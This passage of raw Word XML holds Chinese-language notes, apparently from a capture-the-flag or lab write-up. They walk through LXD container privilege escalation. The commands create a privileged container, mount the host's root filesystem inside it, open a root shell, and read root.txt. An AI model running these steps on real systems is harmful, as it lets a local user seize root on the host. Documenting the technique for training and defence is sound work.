      <w:r>
        <w:t>privileged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的flag调整为true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362F7B54" w14:textId="77777777" w:rsidR="00335055" w:rsidRPr="00AB6A7D" w:rsidRDefault="00335055" w:rsidP="00AB6A7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6181B91A" w14:textId="398D6995" w:rsidR="00DC1FDF" w:rsidRDefault="00335055">
      <w:r w:rsidRPr="00335055">
        <w:t>lxc init alpine privesc -c security.privileged=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01185C43" w14:textId="1E9835BB" w:rsidR="00335055" w:rsidRDefault="00335055"/>
    <w:p w14:paraId="50521409" w14:textId="3CDEABE8" w:rsidR="00335055" w:rsidRDefault="00335055">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时还需要把root文件系统的路径改到/</w:t>
      </w:r>
      <w:r>
        <w:t>mnt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C0390B" w14:textId="4575CA28" w:rsidR="00335055" w:rsidRDefault="00335055">
      <w:r w:rsidRPr="00335055">
        <w:t>lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D9496E" w14:textId="74E2E630" w:rsidR="00335055" w:rsidRDefault="00335055"/>
    <w:p w14:paraId="3FA5A87D" w14:textId="3B12FFF0" w:rsidR="00335055" w:rsidRDefault="00335055">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终我们可以在contanier中执行root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F16B2F" w14:textId="5667B8AF" w:rsidR="00335055" w:rsidRDefault="00335055">
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>privesc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6424E3FE" w14:textId="07ABB61E" w:rsidR="00335055" w:rsidRDefault="00335055">
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>privesc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61765432" w14:textId="1388DDF4" w:rsidR="00335055" w:rsidRDefault="00335055"/>
    <w:p w14:paraId="04B7A0AD" w14:textId="7926187C" w:rsidR="00335055" w:rsidRDefault="00335055">
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D4E320" w14:textId="5C21AEA2" w:rsidR="00335055" w:rsidRDefault="00335055">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>mnt/root/root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133567B4" w14:textId="10B784A4" w:rsidR="00335055" w:rsidRPr="00DC1FDF" w:rsidRDefault="00335055">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Cat root.txt</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00335055" w:rsidRPr="00DC1FDF">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F8D"/>
    <w:rsid w:val="002D1F0A"/>
    <w:rsid w:val="00312C87"/>
    <w:rsid w:val="00335055"/>
    <w:rsid w:val="004744EA"/>
    <w:rsid w:val="00476B12"/>
    <w:rsid w:val="00603643"/>
    <w:rsid w:val="00935C6D"/>
    <w:rsid w:val="00972E9C"/>
    <w:rsid w:val="00986646"/>
    <w:rsid w:val="00AB6A7D"/>
    <w:rsid w:val="00AF3F8D"/>
    <w:rsid w:val="00DC1FDF"/>
    <w:rsid w:val="00DE4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173F1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{71931A31-EFDC-460D-869A-5C9B934D3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FDF"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DC1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zlgxzswjy/p/14790554.html"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hackingarticles.in/lxd-privilege-esca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3</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Shanwen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Xi Shanwen</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-28T19:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-29T01:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>